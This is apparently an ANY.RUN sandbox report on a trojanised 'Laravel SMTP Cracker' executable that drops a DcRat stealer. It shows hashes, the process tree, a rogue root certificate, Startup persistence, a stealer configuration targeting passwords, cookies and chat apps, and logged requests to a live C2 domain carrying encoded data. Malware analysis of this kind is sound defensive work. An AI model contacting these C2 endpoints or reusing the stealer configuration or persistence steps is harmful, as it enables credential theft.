File name: | Laravel SMTP Cracker By XCATZE.exe |
Full analysis: | https://app.any.run/tasks/49681bd0-c83d-4589-812a-aae8d608a599 |
Verdict: | Malicious activity |
Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
Analysis date: | January 29, 2024, 07:40:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | AA713BB1E753E3204616475070D70F54 |
SHA1: | 4C0508355D6875D2FBD34745FB8D3F84358A8254 |
SHA256: | 618DCF9A7DD83426EE8458666E614579B16664568DF278DE5ADB5E0075340471 |
SSDEEP: | 98304:alzwZEq1zirjP9Mqip1P8817U2Pmo2GcCq0ns2u/r8u1zcHKxU4k/hhw9eQmXlAq:yG5eTACZH52WXiqI |
.exe | | | Win32 Executable MS Visual C++ (generic) (46.3) |
---|---|---|
.exe | | | Win64 Executable (generic) (41) |
.exe | | | Win32 Executable (generic) (6.6) |
.exe | | | Generic Win/DOS Executable (2.9) |
.exe | | | DOS Executable Generic (2.9) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2023:11:22 08:35:46+01:00 |
ImageFileCharacteristics: | Executable, 32-bit |
PEType: | PE32 |
LinkerVersion: | 14.34 |
CodeSize: | 165888 |
InitializedDataSize: | 1356288 |
UninitializedDataSize: | - |
EntryPoint: | 0x98ead5 |
OSVersion: | 6 |
ImageVersion: | - |
SubsystemVersion: | 6 |
Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
552 | "C:\Users\admin\AppData\Roaming\ms_updater.exe" | C:\Users\admin\AppData\Roaming\ms_updater.exe | — | Laravel SMTP Cracker By XCATZE.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Version: 5.15.2.0 Modules
| |||||||||||||||
1028 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\1tN34cWNhE.bat" " | C:\Windows\System32\cmd.exe | — | ms_updater.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1936 | "C:\Users\admin\AppData\Local\Temp\Laravel SMTP Cracker By XCATZE.exe" | C:\Users\admin\AppData\Local\Temp\Laravel SMTP Cracker By XCATZE.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2404 | "C:\Users\admin\AppData\Roaming\ms_update.exe" | C:\Users\admin\AppData\Roaming\ms_update.exe | Laravel SMTP Cracker By XCATZE.exe | ||||||||||||
User: admin Company: System32 1989-2023 Integrity Level: MEDIUM Description: System32 Exit code: 0 Version: 15.6.13.6 Modules
| |||||||||||||||
2492 | w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 | C:\Windows\System32\w32tm.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Time Service Diagnostic Tool Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2804 | "C:\Users\admin\AppData\Roaming\ms_updater.exe" | C:\Users\admin\AppData\Roaming\ms_updater.exe | Laravel SMTP Cracker By XCATZE.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
DcRat(PID) Process(2804) ms_updater.exe C2 (1)https://pastebin.com/raw/LWvs8stk Options MutexDCR_MUTEX-jXkHv65ifMXN5oCQdgi1 savebrowsersdatatosinglefilefalse ignorepartiallyemptydatafalse cookiestrue passwordstrue formstrue ccfalse historyfalse telegramtrue steamtrue discordtrue filezillatrue screenshottrue clipboardtrue sysinfotrue searchpath%UsersFolder% - Fast Targetru |
(PID) Process: | (1936) Laravel SMTP Cracker By XCATZE.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1936) Laravel SMTP Cracker By XCATZE.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1936) Laravel SMTP Cracker By XCATZE.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1936) Laravel SMTP Cracker By XCATZE.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6 |
Operation: | write | Name: | Blob |
Value: 0300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3 | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6 |
Operation: | write | Name: | Blob |
Value: 0F00000001000000200000009065F32AFC2CFEA7F452D2D6BE94D20C877EFC1C05433D9935696193FDCC05D80300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3 | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6 |
Operation: | write | Name: | Blob |
Value: 1400000001000000140000005D6CA352CEFC713CBBC5E21F663C3639FD19D4D70300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB60F00000001000000200000009065F32AFC2CFEA7F452D2D6BE94D20C877EFC1C05433D9935696193FDCC05D8200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3 | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2804) ms_updater.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2404 | ms_update.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | executable | |
MD5:8597488355F310BC0046FD9F3EB87C6B | SHA256:9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5 | |||
1936 | Laravel SMTP Cracker By XCATZE.exe | C:\Users\admin\AppData\Roaming\ms_updater.exe | executable | |
MD5:5CEE940B52DA0E967FECB1133B6304D0 | SHA256:0CBC0042EA0C1F235C35CFC40A62D29A5D794535FA164DFB57F7B90334FFE767 | |||
1936 | Laravel SMTP Cracker By XCATZE.exe | C:\Users\admin\AppData\Roaming\ms_update.exe | executable | |
MD5:8597488355F310BC0046FD9F3EB87C6B | SHA256:9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5 | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\SUi1uE2F7w | binary | |
MD5:A5B55EF875A290F8739655274B5CFAE6 | SHA256:3C6E069A7DF07EE5ECA265821545BD9B5A0BE65DCA21805D42B10133D12916CF | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\UPy4C0F0vu | binary | |
MD5:DFF735A9C495C8AB72506ACAEF7044B7 | SHA256:7B66A4E7C5674A9CADD618CD5C73BC8190B2A600F4A35C47A6BCB70420CDA6E6 | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\Y1fI6vdbxq | binary | |
MD5:404978FF2147D79C2046D7D50911281E | SHA256:F55B3160936E6D358A76CC1561C7A4D54E325929ECE887C287BEC79A986B03D1 | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\8929Pb5XnS | binary | |
MD5:A5B55EF875A290F8739655274B5CFAE6 | SHA256:3C6E069A7DF07EE5ECA265821545BD9B5A0BE65DCA21805D42B10133D12916CF | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\lbSR4Pc6n0 | binary | |
MD5:A5B55EF875A290F8739655274B5CFAE6 | SHA256:3C6E069A7DF07EE5ECA265821545BD9B5A0BE65DCA21805D42B10133D12916CF | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\0FxfybW8GU | binary | |
MD5:A5B55EF875A290F8739655274B5CFAE6 | SHA256:3C6E069A7DF07EE5ECA265821545BD9B5A0BE65DCA21805D42B10133D12916CF | |||
2804 | ms_updater.exe | C:\Users\admin\AppData\Local\Temp\88twCLiUS2 | binary | |
MD5:5437864C133F53E6A43FC8678FEE8CA9 | SHA256:037369299FE8F3E3755FD3D7B421AE7676B1D713D948A4BF02AC138AAEA55748 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?h1Gu59oh2INmj1v=1gs2kEUBpksW&ZsAPnQSg6w0GB8g08gBSmlqMn1dh=EVRR&17789cb3578c6680ba919ed580bcbc59=c33b5fda8c587ac7ab22b49b86ea1260&024ace78b46de9dec7d33cd74bf374d2=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&h1Gu59oh2INmj1v=1gs2kEUBpksW&ZsAPnQSg6w0GB8g08gBSmlqMn1dh=EVRR | unknown | text | 2.08 Kb | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOisHL9JCMYZWa4oWS2k0QOlGZUpVaOdlW410VOpXWE10MRd1T41UbZRTWHpFMZpmW6VkeNxmSU5EejpmT4dmaaRzYE9Uaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZJpXTnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WS1x2RilnVtFldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWS1UzVZRnSYpFSCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS51EMnpmT1dGRMRzZU1Ee0MUTxkUaPlWTyI2cKNETpVVRSl2bqlUNKhEZ1Z1MipmSDxUaVJzY6Z1RTl2bqlUd5cVYuZVbjl2dplUdsdVWOJ0UihmQDRWeW5mWyVzVZlnWrlkNJNVZwwmMZl2dplUMjpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI5MWYhJzMzUGZyYGZ3ETN3YzMhN2NzI2N0YzYiVzMiJGOmNTM1kzNyIiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=d1nI5oUeaVHbXJGa50WVjhnVZBjRHJ1dChVUjhHbiBXMHpFa4ZEW6pEWapnVGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOisHL9JCMYZWa4oWS2k0QOlGZUpVaOdlW410VOpXWE10MRd1T41UbZRTWHpFMZpmW6VkeNxmSU5EejpmT4dmaaRzYE9Uaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZJpXTnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WS1x2RilnVtFldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWS1UzVZRnSYpFSCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS51EMnpmT1dGRMRzZU1Ee0MUTxkUaPlWTyI2cKNETpVVRSl2bqlUNKhEZ1Z1MipmSDxUaVJzY6Z1RTl2bqlUd5cVYuZVbjl2dplUdsdVWOJ0UihmQDRWeW5mWyVzVZlnWrlkNJNVZwwmMZl2dplUMjpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI5MWYhJzMzUGZyYGZ3ETN3YzMhN2NzI2N0YzYiVzMiJGOmNTM1kzNyIiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
